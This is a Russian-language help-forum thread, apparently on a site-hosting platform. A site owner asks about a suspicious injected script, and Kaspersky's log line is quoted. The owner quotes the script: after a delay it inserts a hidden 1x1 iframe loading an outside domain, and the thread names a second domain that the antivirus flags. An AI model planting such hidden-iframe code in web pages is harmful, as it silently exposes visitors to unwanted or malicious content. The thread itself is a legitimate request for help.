Question

Добрый день, у меня такой же вопрос.

В исходном коде сайта непонятный фрагмент

<script type="text/javascript" src="//s19.ucoz.net/cgi/uutils.fcg?a=uSD&ca=2&ug=4&isp=1&r=0.737759654547055"></script>

периодически скрипт меняет сайт перехода. Касперский блокирует переход по ссылке из этого скрипта. Подскажите, что это и можно ли от этого избавиться? Если не сложно, обьясните, можно ли от этого избавиться самому?

Answer 1

Предоставьте скриншот отчета антивируса, чтобы было видно на что конкретно он ругается.

Comments

Проверьте повторно наличие проблемы. Если сможете предоставить скриншот или текстовый отчет антивируса где он ругался на эту ссылку или конкретный код на сайте в данном скрипте, был бы вам благодарен.

---

Yuri_Geruk,

Добрый день, извините, фрагмент исчез, наверное отроботала ТП, я ранее туда написал, просто они долго отвечали ( до сих пор не ответили, если честно).

Код в скрипте был такой:

 setTimeout(function(){ 	var statfrm = document.createElement("iframe"); 	statfrm.setAttribute("src","https://zdravselhoz.com/qySpDHxK"); 	statfrm.setAttribute("frameborder","0"); 	statfrm.setAttribute("width","1"); 	statfrm.setAttribute("height","1"); 	statfrm.setAttribute("style","display:none;"); 	document.body.appendChild(statfrm); },2000);

Конкретно на "https://zdravselhoz.com/qySpDHxK" касперский не ругается, но адрес сайта периодически меняется на "http://iofutureisback.com/favicon.ico" и вот уже на него касперский выдает:

13.03.2020 10.49.52;Заблокирован опасный веб-адрес;http://iofutureisback.com/favicon.ico;http://iofutureisback.com/favicon.ico;Веб-адрес;Информация из Kaspersky Security Network;Yandex;03/13/2020 10:49:52

 

---

Дмитрий Бобров,

Спасибо за информацию!